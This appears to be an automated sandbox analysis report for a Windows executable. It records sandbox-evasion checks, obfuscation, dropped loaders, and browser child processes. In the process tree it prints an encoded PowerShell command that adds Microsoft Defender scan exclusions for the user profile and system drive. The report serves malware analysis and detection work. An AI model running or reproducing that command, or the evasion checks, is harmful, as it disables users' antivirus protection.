Analysis
-
max time kernel
149s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
15/07/2023, 22:08
Behavioral task
behavioral1
Sample
protmepls_BUT_BETTER_.exe
Resource
win7-20230712-en
General
-
Target
protmepls_BUT_BETTER_.exe
-
Size
15.7MB
-
MD5
3b175c33f73bcf59abb1b2b50fed49de
-
SHA1
13145dc1dfa3e6e6f1b762f8a016c298d3de744b
-
SHA256
dcfbfc44d17764159537d568afbe19e7bd981f08888c1e9fce9024a993858c28
-
SHA512
c3f59ef7f099c06e7d5bb45b72e8f206153c0e45b487eb8b6b801542bf6845aa5ee54c1e4800801e503c477cc7068593a95cc37cd410dd8e021cbf948ba83deb
-
SSDEEP
393216:5kLHj6tecPWNYP/VaMHAojfY4L4wAqvHV1opGH3u7n0dFsg0QQe+GrJG7bmxbo6:5ej6tenu/Pgojw8iqfTopL7yFaVe+GkW
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ protmepls_BUT_BETTER_.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion protmepls_BUT_BETTER_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion protmepls_BUT_BETTER_.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000\Control Panel\International\Geo\Nation protmepls_BUT_BETTER_.exe -
Executes dropped EXE 2 IoCs
pid Process 1648 CompPkgSrv.exe 3932 OMM Loader.exe -
Obfuscated with Agile.Net obfuscator 3 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/files/0x00080000000231df-143.dat agile_net behavioral2/files/0x00080000000231df-168.dat agile_net behavioral2/files/0x00080000000231df-170.dat agile_net -
resource yara_rule behavioral2/memory/1644-133-0x0000000000400000-0x0000000001F4A000-memory.dmp themida behavioral2/memory/1644-135-0x0000000000400000-0x0000000001F4A000-memory.dmp themida behavioral2/memory/1644-166-0x0000000000400000-0x0000000001F4A000-memory.dmp themida behavioral2/memory/1644-171-0x0000000000400000-0x0000000001F4A000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA protmepls_BUT_BETTER_.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1644 protmepls_BUT_BETTER_.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 777007.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 4452 powershell.exe 4452 powershell.exe 2576 msedge.exe 2576 msedge.exe 3492 msedge.exe 3492 msedge.exe 5428 identity_helper.exe 5428 identity_helper.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe 1380 msedge.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4452 powershell.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe 3492 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 4452 1644 protmepls_BUT_BETTER_.exe 93 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1644 wrote to memory of 1648 1644 protmepls_BUT_BETTER_.exe 108 PID 1648 wrote to memory of 3932 1648 CompPkgSrv.exe 96 PID 1648 wrote to memory of 3932 1648 CompPkgSrv.exe 96 PID 3932 wrote to memory of 3492 3932 OMM Loader.exe 98 PID 3932 wrote to memory of 3492 3932 OMM Loader.exe 98 PID 3492 wrote to memory of 2004 3492 msedge.exe 99 PID 3492 wrote to memory of 2004 3492 msedge.exe 99 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 764 3492 msedge.exe 103 PID 3492 wrote to memory of 2576 3492 msedge.exe 102 PID 3492 wrote to memory of 2576 3492 msedge.exe 102 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104 PID 3492 wrote to memory of 2668 3492 msedge.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"C:\Users\Admin\AppData\Local\Temp\protmepls_BUT_BETTER_.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdwBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAdQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAaABxACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Users\Admin\protmepls.exe"C:\Users\Admin\protmepls.exe"2⤵PID:1648
-
C:\Users\Admin\AppData\Local\Temp\protmepls_b69eae24-8547-42a0-be3a-b8f55eaf90b1\OMM Loader.exe"C:\Users\Admin\AppData\Local\Temp\protmepls_b69eae24-8547-42a0-be3a-b8f55eaf90b1\OMM Loader.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://aka.ms/dotnet-core-applaunch?missing_runtime=true&arch=x64&rid=win10-x64&apphost_version=6.0.13&gui=true4⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc5bd046f8,0x7ffc5bd04708,0x7ffc5bd047185⤵PID:2004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:25⤵PID:764
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2840 /prefetch:85⤵PID:2668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:15⤵PID:4332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:15⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:15⤵PID:3124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:15⤵PID:4024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3468 /prefetch:85⤵PID:4676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:15⤵PID:4148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 /prefetch:85⤵PID:924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:15⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:15⤵PID:456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:15⤵PID:5268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:15⤵PID:5260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:85⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,6648741069571374850,5797565471835798010,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6272 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:1380
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1712
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1648
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b950ebe404eda736e529f1b0a975e8db
SHA14d2c020f1aa70e2bcb666a2dd144d1f3588430b8
SHA256bcc60276d7110e8d002f24d66ebb043c5761e2a4b6ae7854983cef4beacd9bf4
SHA5126ba228e5b6464c9602db81de8e1189302d0b2aed78a8b06248ccd9f095ede8621fc9d0faed0a7d079b8c7f4d1164b2895c4d0ef99c93cb95bbe210033e40295a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize312B
MD5f795d2d5f0a5c3183f572d8061cd09a4
SHA104ad94973d70a787e17f78f57df7e2d6083e69ad
SHA2561b619f65cf0c94ea434b5abc32feffb354c5dfd2f11662e07328aae31366fa82
SHA51235998f7e829a3829a7098de9a6b0012f8c5e37846f8f1debac3c74766f849d1315bbef95898383c472132f5e1b6b8a59abe7ffebc1fb3893f21bd03a66474c7a
-
Filesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
Filesize
811B
MD5e207c64d13183ce95d5951aa0945e575
SHA184388440602a28c0c20ec9c5a039dd87658adc38
SHA256e343fd265dfb64ac866e7e5f9b8ce1ec4341983cb22aadcd10f37f007cd943c2
SHA512ddffe6197733720434746b1683281c366409d60550f28ad552f980c413c5f6ee4e5eee648b70ada1cd1e4e70a12cc184ea391f59da86facbb9430c72c179005d
-
Filesize
5KB
MD5e36e039f50948e516a4bf1e8cc40d133
SHA15276be39297f9a3d00870cbc001581747f7c0a46
SHA2567920d9f15630d390d1fcced4623e85ea4d0d3026be0c5a96f14c98370c20fcd8
SHA51270b7dfb125181cf759fb690921a30632db4b4d72fcc1acbe185536f36fa1e58f0617c58db2ef06f6ecac546888722ba885e0241c748239929748c9d93a0c1d8a
-
Filesize
5KB
MD54e1e881d7c9c1324b0167bff1d9b2bdb
SHA1525a170e007249deefb64debf527eb23e13478c9
SHA2560606da79fa1ce7d1f15f15899e55b660d8d5a7033fbc75d967d498da1faec264
SHA512333fafbb0fcfcd45e50e8948e80627fb00173bc07b6dfc0d80dc61ced4e4ab2874363aee42bd7a3019ce3ab44c40a52e81e7fdc67ecc35e195e1f26d50aa794e
-
Filesize
5KB
MD51f1201d0af416af593e6016773d4ba54
SHA1ae03e0883c30cac82e1f667ac26b6f5855ceaf15
SHA256c3dbd7fb2ef8cb860d73ea72b3e574fea2008ed1140d1be3470587ff89d3aebf
SHA512268ced4d01a8563a3506b7a0793cff3bacaced3667dea7b8bdc6cc0e561262e2b08ca5b1bb8b015d08446aa1f42e7c720c82c916c3fe54c7e422c39f494f9fe3
-
Filesize
24KB
MD5ca36933e6dea7aa507a272121b34fdbb
SHA13b4741ca0308b345de5ecf6c3565b1dbacb0fb86
SHA256fd14449eb781c58e6e7196a384caf25cba0c59ebdba3b10f8ca0ecfd0c076b5d
SHA5125a9b186ecf085765caee97a2910008dda926ce412001042e165184083a52fb5fb70f05ca781cd2f7740ecbd938895c77c5aa0f9eb8d812b92f412f336212720e
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
12KB
MD5eba69ab7fe8d519e18749c45003260dd
SHA19ff235e9ab44f70992ef0365dabf6c3378582f32
SHA256e475f2fd372d8fd8f42ade1671abaa8ba55ad3aa7f59a3a47673e89ed8e61bd2
SHA512b1d4f9454ab5f3362d550c8988ebac9a29953fec391bf9ebfda03c9e5abad4839e4d3665aea0c626330134108b8219a733afd689399de42b9244a83fc2bec406
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
144KB
MD54b07d4daa90e051ca065e497c8d21346
SHA1248cce5809f7dbde17402ecb36bced1b071f9972
SHA25670795c1cda206491cafa049ad16bb7def36c08462e9133e7cea2ed55f1e61848
SHA5120c765fd2d67fe215942b838acd27f23298645eed56acc73dce75f721501f5fa8b89e37a3303b6ce2a6a1f111885e8d28a280cfb985d1b6521698a7bb77622545
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465
-
Filesize
21.3MB
MD51bc9df12a338938019d8a42237566b5f
SHA14a1139848239d0fab1a07d2e328dc3732b92bdab
SHA256f8759733e825b911c48356f73a1c4fe1b703ecad786a773a8963c4eeff4afc94
SHA512506b56b43d271f38eba4612f8310ee1ec2ccb413e105a4cd493165aa975e0431900eef0be0eaa25d01081b9ce8117121e08ebdd0cde47178a7560afd6161e465